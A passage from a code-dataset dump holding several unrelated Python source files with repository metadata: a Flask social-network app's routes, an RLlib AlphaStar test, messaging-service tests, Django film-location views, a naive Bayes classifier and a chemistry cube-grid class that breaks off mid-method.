ident=identificator,\r\n friends=friends, message=message,\r\n who=who)\r\n\r\n\r\n@app.route(\"/user/id/subscribers\",\r\n methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef get_subscribers(identificator):\r\n query = None\r\n if request.method == \"POST\":\r\n if request.args.get(\"sort\", None) not in sort_types:\r\n session[\"sort_type\"] = sort_types[0]\r\n else:\r\n session[\"sort_type\"] = request.args[\"sort\"]\r\n if request.form.get(\"query\", None) is not None:\r\n query = request.form[\"query\"]\r\n user = User.query.filter_by(\r\n id=identificator).first()\r\n who = f\"{user.name} {user.surname}\".title()\r\n fr = [User.query.filter_by(id=rel.friend_from).first() for rel in\r\n Relations.query.filter_by(friend_to=user.id).all()]\r\n if query is not None:\r\n friends = list(filter(lambda\r\n x: query.lower() in x.name.lower()\r\n or query.lower()\r\n in x.surname.lower()\r\n or query.lower() in\r\n x.name.lower() + \" \" +\r\n x.surname.lower(),\r\n fr))\r\n else:\r\n friends = fr\r\n return render_template(\"friends.html\", ident=identificator,\r\n friends=friends, message=\"Подписчики пользователя\",\r\n who=who)\r\n\r\n\r\n@app.route(\"/user/id\", methods=['GET', 'POST'])\r\n@login_required\r\ndef user_page(identificator):\r\n user = User.query.filter_by(\r\n id=identificator).first()\r\n if user is None:\r\n return redirect(\"/404\")\r\n self = User.query.filter_by(\r\n id=session.get('id')).first()\r\n is_friend = True if Relations.query.filter_by(friend_from=self.id,\r\n friend_to=user.id).all() \\\r\n else False\r\n qty = len(Relations.query.filter_by(friend_from=user.id).all())\r\n qty_sb = len(Relations.query.filter_by(friend_to=user.id).all())\r\n form = ArticleForm()\r\n if form.validate_on_submit():\r\n if session.get(\"id\") != identificator:\r\n return redirect(\"/404\")\r\n art = Article(user_id=identificator, title=request.form.get(\"title\"),\r\n content=request.form.get(\"content\"),\r\n is_with_files=bool(request.files))\r\n if 'file' in request.files:\r\n nfile = FileInArticle(name=request.files['file'].filename,\r\n file=request.files['file'].stream.read())\r\n art.files.append(nfile)\r\n db.session.add(nfile)\r\n db.session.add(art)\r\n db.session.commit()\r\n articles = reversed(Article.query.filter_by(user_id=identificator).all())\r\n return render_template(\"user_page.html\",\r\n date=\".\".join(reversed(str(user.date).split(\"-\"))),\r\n user=user, is_friends=is_friend,\r\n qty=qty,\r\n qty_sb=qty_sb,\r\n form=form, articles=articles)\r\n\r\n\r\n@app.route(\"/addfriend/id\",\r\n methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef add_friend(ident):\r\n if request.method == \"POST\":\r\n do_magic(ident, \"ad\")\r\n return redirect(f\"/user/id{ident}\")\r\n\r\n\r\n@app.route(\"/rmfriend/id\", methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef remove_friend(ident):\r\n if request.method == \"POST\":\r\n do_magic(ident, \"rm\")\r\n return redirect(f\"/user/id{ident}\")\r\n\r\n\r\n@app.route(\"/delete_article/\")\r\n@login_required\r\ndef delete_article(ident):\r\n art = Article.query.filter_by(id=ident)\r\n idnt = art.first().user_id\r\n if art.first() and (idnt == session.get(\"id\") or session.get(\"is_admin\")):\r\n if art.first().is_with_files:\r\n FileInArticle.query.filter_by(id=art.first().files[0].id).delete()\r\n art.delete()\r\n db.session.commit()\r\n return redirect(f\"/user/id{idnt}\")\r\n\r\n\r\n@app.route(\"/get_file/\")\r\n@login_required\r\ndef get_file(ident):\r\n file = FileInArticle.query.filter_by(id=ident).first()\r\n if file:\r\n return send_file(BytesIO(file.file), attachment_filename=file.name,\r\n as_attachment=True)\r\n else:\r\n redirect(\"/404\")\r\n\r\n\r\n@app.errorhandler(404)\r\ndef error_404(e):\r\n return render_template(\"404.html\"), 404\r\n\r\n\r\n@app.errorhandler(500)\r\ndef server_error(e):\r\n return render_template(\"500.html\"), 500\r\n\r\n\r\n@app.route(\"/error\")\r\ndef err():\r\n return error_404(\"a\")\r\n\r\n\r\n@app.route(\"/logout\")\r\ndef logout():\r\n if session.get(\"username\", None) is not None:\r\n session.clear()\r\n return redirect(\"/login\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n db.create_all()\r\n app.run(host=\"0.0.0.0\", port=80)\r\n","repo_name":"HehexOne/PuralSocialNet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24852873620","text":"import pprint\nimport pyspiel\nimport unittest\n\nimport ray\nimport ray.rllib.agents.alpha_star as alpha_star\nfrom ray.rllib.env.wrappers.open_spiel import OpenSpielEnv\nfrom ray.rllib.utils.test_utils import (\n check_compute_single_action,\n check_train_results,\n framework_iterator,\n)\nfrom ray.tune import register_env\n\n# Connect-4 OpenSpiel env.\nregister_env(\"connect_four\", lambda _: OpenSpielEnv(pyspiel.load_game(\"connect_four\")))\n\n\nclass TestAlphaStar(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n ray.init(num_cpus=20)\n\n @classmethod\n def tearDownClass(cls):\n ray.shutdown()\n\n def test_alpha_star_compilation(self):\n \"\"\"Test whether a AlphaStarTrainer can be built with all frameworks.\"\"\"\n\n config = {\n \"env\": \"connect_four\",\n \"gamma\": 1.0,\n \"num_workers\": 4,\n \"num_envs_per_worker\": 5,\n \"model\": {\n \"fcnet_hiddens\": [256, 256, 256],\n },\n \"vf_loss_coeff\": 0.01,\n \"entropy_coeff\": 0.004,\n \"league_builder_config\": {\n \"win_rate_threshold_for_new_snapshot\": 0.8,\n \"num_random_policies\": 2,\n \"num_learning_league_exploiters\": 1,\n \"num_learning_main_exploiters\": 1,\n },\n \"grad_clip\": 10.0,\n \"replay_buffer_capacity\": 10,\n \"replay_buffer_replay_ratio\": 0.0,\n # Two GPUs -> 2 policies per GPU.\n \"num_gpus\": 4,\n \"_fake_gpus\": True,\n # Test with KL loss, just to cover that extra code.\n \"use_kl_loss\": True,\n }\n\n num_iterations = 2\n\n for _ in framework_iterator(config, with_eager_tracing=True):\n _config = config.copy()\n trainer = alpha_star.AlphaStarTrainer(config=_config)\n for i in range(num_iterations):\n results = trainer.train()\n check_train_results(results)\n pprint.pprint(results)\n check_compute_single_action(trainer)\n trainer.stop()\n\n\nif __name__ == \"__main__\":\n import pytest\n import sys\n\n sys.exit(pytest.main([\"-v\", __file__]))\n","repo_name":"santosh-shetkar-katonic/ray-cluster","sub_path":"rllib/agents/alpha_star/tests/test_alpha_star.py","file_name":"test_alpha_star.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38880241875","text":"from unittest.mock import patch\n\nfrom backend.models.dtos.message_dto import MessageDTO\nfrom backend.services.messaging.message_service import MessageService\nfrom backend.models.postgis.statuses import TaskStatus\nfrom backend.models.postgis.message import MessageType\nfrom backend.models.postgis.task import Task\nfrom backend.services.messaging.smtp_service import SMTPService\nfrom tests.backend.helpers.test_helpers import (\n add_manager_to_organisation,\n create_canned_organisation,\n return_canned_user,\n create_canned_project,\n update_project_with_info,\n)\nfrom tests.backend.base import BaseTestCase\n\n\nclass TestMessageService(BaseTestCase):\n def test_welcome_message_sent(self):\n self.test_user = return_canned_user()\n self.test_user.create()\n # Act\n message_id = MessageService.send_welcome_message(self.test_user)\n self.assertIsNotNone(message_id)\n message = MessageService.get_message(message_id, self.test_user.id)\n\n # Assert\n self.assertTrue(message, \"Message should be saved to DB\")\n\n # Tidyup\n MessageService.delete_message(message_id, self.test_user.id)\n\n def test_validation_message_is_not_sent_for_validating_self_mapped_task(self):\n # Arrange\n status = TaskStatus.VALIDATED.value\n validated_by = 777 # random user id\n mapped_by = 777 # random user id\n project_id = 1 # random project id\n task_id = 1 # random task id\n # Act/Assert\n self.assertFalse(\n MessageService.send_message_after_validation(\n status, validated_by, mapped_by, project_id, task_id\n )\n )\n\n @patch.object(MessageService, \"_push_messages\")\n def test_validation_message_is_sent_after_task_validation(self, mock_push_message):\n # Arrange\n status = TaskStatus.VALIDATED.value\n canned_project, canned_author = create_canned_project()\n update_project_with_info(canned_project)\n canned_user = return_canned_user()\n canned_user.id, canned_user.username = 100000, \"test_user\"\n canned_user.create()\n # Act\n MessageService.send_message_after_validation(\n status, canned_author.id, canned_user.id, 1, canned_project.id\n )\n\n # Assert\n mock_push_message.assert_called()\n\n @patch.object(MessageService, \"_push_messages\")\n def test_send_message_to_all_contributors(self, mock_push_message):\n # Arrange\n canned_project, canned_author = create_canned_project()\n canned_project = update_project_with_info(canned_project)\n canned_user = return_canned_user()\n canned_user.id, canned_user.username = 100000, \"test_user\"\n canned_user.create()\n task = Task.get(1, canned_project.id)\n task.mapped_by = canned_user.id\n message_dto = MessageDTO()\n message_dto.message_id = 12\n message_dto.subject = \"Test subject\"\n message_dto.message = \"Test message\"\n message_dto.from_user_id = canned_author.id\n message_dto.from_username = canned_author.username\n message_dto.project_id = canned_project.id\n message_dto.project_title = \"Test project\"\n message_dto.message_type = MessageType.PROJECT_ACTIVITY_NOTIFICATION.value\n message_dto.sent_date = \"2020-01-01\"\n # Act\n MessageService.send_message_to_all_contributors(canned_project.id, message_dto)\n # Assert\n mock_push_message.assert_called()\n\n @patch.object(MessageService, \"_push_messages\")\n def test_send_message_after_comment(self, mock_push_message):\n # Arrange\n canned_project, canned_author = create_canned_project()\n canned_project = update_project_with_info(canned_project)\n canned_user = return_canned_user()\n canned_user.id, canned_user.username = 100000, \"test_user\"\n canned_user.create()\n # Act\n MessageService.send_message_after_comment(\n canned_author.id, \"@test_user Test message\", 1, canned_project.id\n )\n # Assert\n mock_push_message.assert_called()\n\n @patch.object(SMTPService, \"_send_message\")\n def test_send_project_transfer_messgae(self, mock_send_message):\n test_project, test_author = create_canned_project()\n test_user = return_canned_user(\"test_user\", 11111)\n test_user.email_address = \"test@hotmalinator.com\"\n test_user.is_email_verified = True\n test_user.create()\n test_organisation = create_canned_organisation()\n test_project.organisation = test_organisation\n add_manager_to_organisation(test_organisation, test_user)\n MessageService.send_project_transfer_message(\n test_project.id, test_user.username, test_author.username\n )\n mock_send_message.assert_called()\n","repo_name":"osmus/tasking-manager","sub_path":"tests/backend/integration/services/messaging/test_messaging_service.py","file_name":"test_messaging_service.py","file_ext":"py","file_size_in_byte":4832,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"32147551102","text":"# -*- coding: utf-8 -*-\n\n# Imports\nfrom __future__ import unicode_literals\n\nimport json\nimport logging\n\nfrom django.template import loader\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.http import require_POST\nfrom django.urls import reverse\nfrom django.db.models import Count\n\nfrom common.views import error, not_found\nfrom .models import Location, NO_COUNTIES, LOCATION_TYPES\nfrom .forms import LocationForm\n\n\n# Logger\nlogger = logging.getLogger('norloc')\n\n\n# View/JSON: Locations\ndef locations(request, county=None, place=None, json=False):\n # Filter\n locations = Location.objects\n \n if county:\n locations = locations.filter(county=county)\n\n if place:\n locations = locations.filter(place_slug=place)\n\n locations = locations.all().annotate(production_count=Count('scene__production', distinct=True))\n\n # elif filter in ['film', 'tv']:\n # # Filter by type\n # productions = Production.objects.filter(type={\n # 'film': 'film',\n # 'tv': 'show',\n # }.get(filter)).order_by('-release')\n\n # else:\n # # Invalid filter\n # return not_found(request)\n\n\n # Locations in JSON format\n if json:\n # Return JSON\n include_bounds = request.GET.get('bounds', '').lower() == 'true'\n\n return JsonResponse({'locations': [{\n 'pk': location.pk,\n 'full_address': location.full_address,\n 'bounds': location.bounds if location.bounds else []\n } for location in locations]})\n\n # Render template\n return render(request, 'locations.html', {\n # 'filter': filter,\n 'counties': NO_COUNTIES,\n 'location_types': LOCATION_TYPES,\n 'locations': locations\n })\n\n\n# View: Location\ndef location(request, county, place, slug):\n # Location\n location = get_object_or_404(Location, county=county, place_slug=place, slug=slug)\n edit_request = bool(request.GET.get('edit', False))\n edit_mode = edit_request and request.user.is_authenticated()\n form = None\n\n # Edit location (GET)\n if request.method == 'GET' and edit_mode:\n # Form\n form = LocationForm(instance=location)\n\n # Update location (POST)\n if request.method == 'POST' and edit_mode:\n form = LocationForm(instance=location, data=request.POST)#, files=request.FILES)\n \n logger.info('Checking if form is valid')\n \n if form.is_valid():\n # Save\n logger.info('Form valid, saving posted data')\n form.save()\n\n # Redirect\n return redirect(reverse('location', args=[form.instance.county, form.instance.place_slug, form.instance.slug]) + '?edit=true')\n\n else:\n logger.error('Form invalid')\n logger.debug(dict(form.errors.items()))\n\n # Render template\n logger.info('Rendering location (%s), slug=%s, edit_mode=%r (requested=%r, auth=%r)' % (\n request.method, location.slug, edit_mode, edit_request, request.user.is_authenticated\n ))\n\n return render(request, 'location.html', {\n 'edit_mode': edit_mode,\n 'form': form if edit_mode else None,\n 'location': location\n })\n\n\n# JSON: Location details\ndef location_details(request, lpk):\n # Location\n location = get_object_or_404(Location, pk=lpk)\n \n productions = {}\n\n for scene in location.scene_set.all().order_by('production__release'):\n if scene.production.pk not in productions:\n productions[scene.production.pk] = {\n 'pk': scene.production.pk,\n 'title': scene.production.title_with_year,\n 'poster': scene.production.poster.url if scene.production.poster else None,\n 'directors': [p.name for p in scene.production.directors.all()],\n 'url': reverse('production', args=[scene.production.type, scene.production.slug]),\n 'scenes': []\n }\n\n productions[scene.production.pk]['scenes'].append({\n 'pk': scene.pk,\n 'description': scene.description,\n 'shot_count': scene.shot_set.count(),\n 'uncertain': scene.uncertain,\n 'shots': [{\n 'image': s.image.url,\n 'timecode': s.timecode,\n 'double': s.double,\n } for s in scene.shot_set.order_by('timecode', 'pk')]\n })\n\n # Return JSON\n return JsonResponse({\n 'pk': location.pk,\n 'url': reverse('location', args=[location.county, location.place_slug, location.slug]),\n 'address': location.address,\n 'place': location.place,\n 'county': location.get_county_display(),\n 'description': location.description,\n 'photo': location.photo.photo.url if location.photo else None,\n 'productions': [p for p in productions.values()],\n })\n\n\n# JSON: Productions (by location)\ndef productions(request, lpk):\n # Production\n location = get_object_or_404(Location, pk=lpk)\n\n # Find all production for given location\n productions = {}\n\n for scene in location.scene_set.all():\n if scene.production.pk not in productions:\n productions[scene.production.pk] = {\n 'title': scene.production.title_with_year,\n 'release': scene.production.release,\n 'directors': [p.name for p in scene.production.directors.all()],\n 'summary': scene.production.summary,\n 'summary_credit': scene.production.summary_credit,\n 'url': reverse('production', args=[scene.production.type, scene.production.slug]),\n 'uncertain': False,\n 'poster': scene.production.poster.url if scene.production.poster else None,\n 'scenes': []\n }\n\n productions[scene.production.pk]['uncertain'] = scene.uncertain\n\n productions[scene.production.pk]['scenes'].append({\n 'pk': scene.pk,\n 'description': scene.description,\n 'shot_count': scene.shot_set.count(),\n 'uncertain': scene.uncertain,\n 'shots': [{\n 'image': s.image.url,\n 'timecode': s.timecode,\n 'double': s.double,\n } for s in scene.shot_set.order_by('timecode', 'pk')]\n })\n\n # Return JSON\n return JsonResponse(productions)\n\n\n# JSON: Update location bounds\n@login_required\n@require_POST\ndef update_location_bounds(request, lpk):\n # Location\n location = get_object_or_404(Location, pk=lpk)\n\n # print '~'*50\n # print location.bounds\n # print location.bounds_locked\n # print '~'*50\n\n if not request.is_ajax():\n return JsonResponse({'success': False})\n\n try:\n # Parse data\n bounds = json.loads(request.body)\n \n # Update location bounds\n location.bounds = bounds\n location.save()\n\n except:\n raise\n return JsonResponse({'success': False})\n\n # Return JSON\n return JsonResponse({'success': True})","repo_name":"petterhj/django-norloc","sub_path":"norloc/locations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31920668431","text":"import operator\r\nimport struct\r\nimport kyotocabinet as kc\r\n\r\n\r\nclass ClassifierDB(kc.DB):\r\n \"\"\"\r\n Wrapper for `kyotocabinet.DB` that provides utilities for working with\r\n features and categories.\r\n \"\"\"\r\n def __init__(self, *args, **kwargs):\r\n super(ClassifierDB, self).__init__(*args, **kwargs)\r\n\r\n self._category_tmpl = 'category.%s'\r\n self._feature_to_category_tmpl = 'feature2category.%s.%s'\r\n self._total_count = 'total-count'\r\n\r\n def get_int(self, key):\r\n # Kyoto serializes ints big-endian 8-bytes long, so we need to unpack\r\n # them using the `struct` module.\r\n value = self.get(key)\r\n if value:\r\n return struct.unpack('>Q', value)[0]\r\n return 0\r\n\r\n def incr_feature_category(self, feature, category):\r\n \"\"\"Increment the count for the feature in the given category.\"\"\"\r\n return self.increment(\r\n self._feature_to_category_tmpl % (feature, category),\r\n 1)\r\n\r\n def incr_category(self, category):\r\n \"\"\"\r\n Increment the count for the given category, increasing the total\r\n count as well.\r\n \"\"\"\r\n self.increment(self._total_count, 1)\r\n return self.increment(self._category_tmpl % category, 1)\r\n\r\n def category_count(self, category):\r\n \"\"\"Return the number of documents in the given category.\"\"\"\r\n return self.get_int(self._category_tmpl % category)\r\n\r\n def total_count(self):\r\n \"\"\"Return the total number of documents overall.\"\"\"\r\n return self.get_int(self._total_count)\r\n\r\n def get_feature_category_count(self, feature, category):\r\n \"\"\"Get the count of the feature in the given category.\"\"\"\r\n return self.get_int(\r\n self._feature_to_category_tmpl % (feature, category))\r\n\r\n def get_feature_counts(self, feature):\r\n \"\"\"Get the total count for the feature across all categories.\"\"\"\r\n prefix = self._feature_to_category_tmpl % (feature, '')\r\n total = 0\r\n for key in self.match_prefix(prefix):\r\n total += self.get_int(key)\r\n return total\r\n\r\n def iter_categories(self):\r\n \"\"\"\r\n Return an iterable that successively yields all the categories\r\n that have been observed.\r\n \"\"\"\r\n category_prefix = self._category_tmpl % ''\r\n prefix_len = len(category_prefix)\r\n for category_key in self.match_prefix(category_prefix):\r\n yield category_key[prefix_len:]\r\n\r\n\r\nclass NBC(object):\r\n \"\"\"\r\n Simple naive bayes classifier.\r\n \"\"\"\r\n def __init__(self, filename, read_only=False):\r\n \"\"\"\r\n Initialize the classifier by pointing it at a database file. If you\r\n intend to only use the classifier for classifying documents, specify\r\n `read_only=True`.\r\n \"\"\"\r\n self.filename = filename\r\n if not self.filename.endswith('.kct'):\r\n raise RuntimeError('Database filename must have \"kct\" extension.')\r\n\r\n self.db = ClassifierDB()\r\n self.connect(read_only=read_only)\r\n\r\n def connect(self, read_only=False):\r\n \"\"\"\r\n Open the database. Since Kyoto Cabinet only allows a single writer\r\n at a time, the `connect()` method accepts a parameter allowing the\r\n database to be opened in read-only mode (supporting multiple readers).\r\n If you plan on training the classifier, specify `read_only=False`.\r\n If you plan only on classifying documents, it is safe to specify\r\n `read_only=True`.\r\n \"\"\"\r\n if read_only:\r\n flags = kc.DB.OREADER\r\n else:\r\n flags = kc.DB.OWRITER\r\n self.db.open(self.filename, flags | kc.DB.OCREATE)\r\n\r\n def close(self):\r\n \"\"\"Close the database.\"\"\"\r\n self.db.close()\r\n\r\n def train(self, features, *categories):\r\n \"\"\"\r\n Increment the counts for the features in the given categories.\r\n \"\"\"\r\n for category in categories:\r\n for feature in features:\r\n self.db.incr_feature_category(feature, category)\r\n self.db.incr_category(category)\r\n\r\n def feature_probability(self, feature, category):\r\n \"\"\"\r\n Calculate the probability that a particular feature is associated\r\n with the given category.\r\n \"\"\"\r\n fcc = self.db.get_feature_category_count(feature, category)\r\n if fcc:\r\n category_count = self.db.category_count(category)\r\n return float(fcc) / category_count\r\n return 0\r\n\r\n def weighted_probability(self, feature, category, weight=1.0):\r\n \"\"\"\r\n Determine the probability a feature corresponds to the given category.\r\n The probability is weighted by the importance of the feature, which\r\n is determined by looking at the feature across all categories in\r\n which it appears.\r\n \"\"\"\r\n initial_prob = self.feature_probability(feature, category)\r\n totals = self.db.get_feature_counts(feature)\r\n return ((weight * 0.5) + (totals * initial_prob)) / (weight + totals)\r\n\r\n def document_probability(self, features, category):\r\n \"\"\"\r\n Calculate the probability that a set of features match the given\r\n category.\r\n \"\"\"\r\n feature_probabilities = [\r\n self.weighted_probability(feature, category)\r\n for feature in features]\r\n return reduce(operator.mul, feature_probabilities, 1)\r\n\r\n def weighted_document_probability(self, features, category):\r\n \"\"\"\r\n Calculate the probability that a set of features match the given\r\n category, and weight that score by the importance of the category.\r\n \"\"\"\r\n if self.db.total_count() == 0:\r\n # Avoid divison by zero.\r\n return 0\r\n\r\n cat_prob = (float(self.db.category_count(category)) /\r\n self.db.total_count())\r\n doc_prob = self.document_probability(features, category)\r\n return doc_prob * cat_prob\r\n\r\n def classify(self, features, limit=5):\r\n \"\"\"\r\n Classify the features by finding the categories that match the\r\n features with the highest probability.\r\n \"\"\"\r\n probabilities = {}\r\n for category in self.db.iter_categories():\r\n probabilities[category] = self.weighted_document_probability(\r\n features,\r\n category)\r\n\r\n return sorted(\r\n probabilities.items(),\r\n key=operator.itemgetter(1),\r\n reverse=True)[:limit]\r\n","repo_name":"nicoisaverage/spam_or_ham","sub_path":"nb_classifier.py","file_name":"nb_classifier.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33190356567","text":"import logging\nimport numpy as np\n\nfrom chemtools.wrappers.molecule import Molecule\n\ntry:\n from importlib_resources import path\nexcept ImportError:\n from importlib.resources import path\n\n\n__all__ = ['UniformGrid']\n\n\nclass UniformGrid(object):\n \"\"\"Class for generating a cubic grid and writing cube files.\"\"\"\n\n def __init__(self, numbers, pseudo_numbers, coordinates, origin, axes, shape):\n \"\"\"Initialize ``UniformGrid`` class based on the origin, axes and shape of the cube.\n\n Parameters\n ----------\n numbers : np.ndarray, shape=(M,)\n Atomic number of `M` atoms in the molecule.\n pseudo_numbers : np.ndarray, shape=(M,)\n Pseudo-number of `M` atoms in the molecule.\n coordinates : np.ndarray, shape=(M, 3)\n Cartesian coordinates of `M` atoms in the molecule.\n origin : np.ndarray, shape=(3,)\n Cartesian coordinates of the cubic grid origin.\n axes : np.ndarray, shape=(3, 3)\n The three vectors, stored as rows of axes array,\n defining the Cartesian coordinate system used to build the\n cubic grid.\n shape : np.ndarray, shape=(3,)\n Number of grid points along `x`, `y`, and `z` axis.\n \"\"\"\n self._numbers = numbers\n self._pseudo_numbers = pseudo_numbers\n self._coordinates = coordinates\n if origin.shape[0] != 3:\n raise ValueError('Argument origin should be an np.ndarray with shape=(3,)')\n self._origin = origin\n if axes.shape[0] != 3 or axes.shape[1] != 3:\n raise ValueError('Argument axes should be an np.ndarray with shape=(3, 3)')\n self._axes = axes\n if shape.shape[0] != 3:\n raise ValueError('Argument shape should be an np.ndarray with shape=(3,)')\n self._shape = shape\n #\n # Make cubic grid\n #\n # Number of points along x, y and z axis\n npoints_x, npoints_y, npoints_z = self._shape\n # Total number of grid points\n self._npoints = npoints_x * npoints_y * npoints_z\n # Make an array to store coordinates of grid points\n self._points = np.zeros((self._npoints, 3))\n coords = np.array(\n np.meshgrid(np.arange(npoints_x), np.arange(npoints_y), np.arange(npoints_z))\n )\n coords = np.swapaxes(coords, 1, 2)\n coords = coords.reshape(3, -1)\n coords = coords.T\n self._points = coords.dot(self._axes)\n # Compute coordinates of grid points relative to the origin\n self._points += self._origin\n\n # log information\n self._log_init()\n\n @classmethod\n def from_molecule(cls, molecule, spacing=0.2, extension=5.0, rotate=True):\n \"\"\"Initialize ``UniformGrid`` class from Molecule object.\n\n Parameters\n ----------\n molecule: instance of `Molecule`\n Instance of Molecule class.\n spacing : float, optional\n Increment between grid points along `x`, `y` and `z` direction.\n extension : float, optional\n The extension of the cube on each side of the molecule.\n rotate : bool, optional\n When True, the molecule is rotated so the axes of the cube file are\n aligned with the principle axes of rotation of the molecule.\n \"\"\"\n numbers = molecule.numbers\n pseudo_numbers = molecule.pseudo_numbers\n coordinates = molecule.coordinates\n # calculate center of mass of the nuclear charges:\n totz = np.sum(pseudo_numbers)\n com = np.dot(pseudo_numbers, coordinates) / totz\n\n if rotate:\n # calculate moment of inertia tensor:\n itensor = np.zeros([3, 3])\n for i in range(pseudo_numbers.shape[0]):\n xyz = coordinates[i] - com\n r = np.linalg.norm(xyz)**2.0\n tempitens = np.diag([r, r, r])\n tempitens -= np.outer(xyz.T, xyz)\n itensor += pseudo_numbers[i] * tempitens\n\n _, v = np.linalg.eigh(itensor)\n new_coordinates = np.dot((coordinates - com), v)\n axes = spacing * v\n\n else:\n # Just use the original coordinates\n new_coordinates = coordinates\n # Compute the unit vectors of the cubic grid's coordinate system\n axes = np.diag([spacing, spacing, spacing])\n\n # maximum and minimum value of x, y and z coordinates\n max_coordinate = np.amax(new_coordinates, axis=0)\n min_coordinate = np.amin(new_coordinates, axis=0)\n # Compute the required number of points along x, y, and z axis\n shape = (max_coordinate - min_coordinate + 2.0 * extension) / spacing\n shape = np.ceil(shape)\n shape = np.array(shape, int)\n # Compute origin\n origin = com - np.dot((0.5 * shape), axes)\n\n return cls(numbers, pseudo_numbers, coordinates, origin, axes, shape)\n\n @classmethod\n def from_cube(cls, fname):\n r\"\"\"Initialize ``UniformGrid`` class based on the grid specifications of a cube file.\n\n Parameters\n ----------\n fname : str\n Cube file name with \\*.cube extension.\n \"\"\"\n fname = str(fname)\n if not fname.endswith('.cube'):\n raise ValueError('Argument fname should be a cube file with *.cube extension!')\n\n # Extract the specifications of the cubic grid from cube file's header\n numbers, pseudo_numbers, coordinates, origin, axes, shape = cls._read_cube_header(fname)\n\n return cls(numbers, pseudo_numbers, coordinates, origin, axes, shape)\n\n @classmethod\n def from_file(cls, fname, spacing=0.2, extension=5.0, rotate=True):\n \"\"\"\n Initialize ``UniformGrid`` class based on the grid specifications of a file.\n\n Parameters\n ----------\n fname : str\n Path to molecule's file.\n spacing : float, optional\n Increment between grid points along `x`, `y` and `z` direction.\n extension : float, optional\n The extension of the cube on each side of the molecule.\n rotate : bool, optional\n When True, the molecule is rotated so the axes of the cube file are\n aligned with the principle axes of rotation of the molecule.\n \"\"\"\n # Load file\n logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')\n try:\n mol = Molecule.from_file(str(fname))\n except IOError as _:\n try:\n with path('chemtools.data.examples', str(fname)) as fname:\n logging.info('Loading {0}'.format(str(fname)))\n mol = Molecule.from_file(str(fname))\n except IOError as error:\n logging.info(error)\n return cls.from_molecule(mol, spacing, extension, rotate)\n\n @property\n def numbers(self):\n \"\"\"Atomic number of the atoms in the molecule.\"\"\"\n return self._numbers\n\n @property\n def pseudo_numbers(self):\n \"\"\"Pseudo-number of the atoms in the molecule.\"\"\"\n return self._pseudo_numbers\n\n @property\n def coordinates(self):\n \"\"\"Cartesian coordinates of the atoms in the molecule.\"\"\"\n return self._coordinates\n\n @property\n def centers(self):\n \"\"\"Cartesian coordinates of the atoms in the molecule.\"\"\"\n return self._coordinates\n\n @property\n def origin(self):\n \"\"\"Cartesian coordinate of the cubic grid origin.\"\"\"\n return self._origin\n\n @property\n def axes(self):\n \"\"\"Array with axes of the cube.\n\n The three vectors, stored as rows of axes array, defining the Cartesian\n coordinate system used to build the cubic grid.\n \"\"\"\n return self._axes\n\n @property\n def shape(self):\n \"\"\"Number of grid points along `x`, `y`, and `z` axis.\"\"\"\n return self._shape\n\n @property\n def npoints(self):\n \"\"\"Total number of grid points.\"\"\"\n return self._npoints\n\n @property\n def points(self):\n \"\"\"Cartesian coordinates of the cubic grid points.\"\"\"\n return self._points\n\n def _log_init(self):\n \"\"\"Log an overview of the cube's properties.\"\"\"\n logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')\n logging.info(\"Initialized cube: {0}\".format(self.__class__))\n logging.info(\"Origin : {0}\".format(self._origin))\n logging.info(\"Axes 1 : {0}\".format(self._axes[0]))\n logging.info(\"Axes 2 : {0}\".format(self._axes[1]))\n logging.info(\"Axes 3 : {0}\".format(self._axes[2]))\n logging.info(\"Shape : {0}\".format(self._shape))\n\n def generate_cube(self, fname, data):\n r\"\"\"Write the data evaluated on grid points into a cube file.\n\n Parameters\n ----------\n fname : str\n Cube file name with \\*.cube extension.\n data : np.ndarray, shape=(npoints,)\n An array containing the evaluated scalar property on the grid points.\n \"\"\"\n if not fname.endswith('.cube'):\n raise ValueError('Argument fname should be a cube file with `*.cube` extension!')\n if data.size != self._npoints:\n raise ValueError('Argument data should have the same size as the grid. ' +\n '{0}!={1}'.format(data.size, self._npoints))\n\n # Write data into the cube file\n with open(fname, 'w') as f:\n # writing the cube header:\n f.write('Cubefile created with HORTON CHEMTOOLS\\n')\n f.write('OUTER LOOP: X, MIDDLE LOOP: Y, INNER LOOP: Z\\n')\n natom = len(self._numbers)\n x, y, z = self._origin\n f.write('{0:5d} {1:11.6f} {2:11.6f} {3:11.6f}\\n'.format(natom, x, y, z))\n rvecs = self._axes\n for i, (x, y, z) in zip(self._shape, rvecs):\n f.write('{0:5d} {1:11.6f} {2:11.6f} {3:11.6f}\\n'.format(i, x, y, z))\n for i, q, (x, y, z) in zip(self._numbers, self._pseudo_numbers, self._coordinates):\n f.write('{0:5d} {1:11.6f} {2:11.6f} {3:11.6f} {4:11.6f}\\n'.format(i, q, x, y, z))\n # writing the cube data:\n num_chunks = 6\n for i in range(0, data.size, num_chunks):\n row_data = data.flat[i:i+num_chunks]\n f.write((row_data.size*' {:12.5E}').format(*row_data))\n f.write('\\n')\n\n def weights(self, method='R'):\n \"\"\"\n Return integration weights at every point on the cubic grid.\n\n Parameters\n ----------\n method : str, optional\n The method for computing the integration weights at every point on the grid. Options:\n\n - 'R' method perfors rectangle/trapezoidal rule, without assuming that the function\n is close to zero at the edges of the grid.\n - 'R0' method performing rectangle/trapezoidal rule, assuming that the function is\n very close to zero at the edges of the grid.\n \"\"\"\n if method == 'R':\n volume = np.linalg.norm(self._shape[0] * self._axes[0])\n volume *= np.linalg.norm(self._shape[1] * 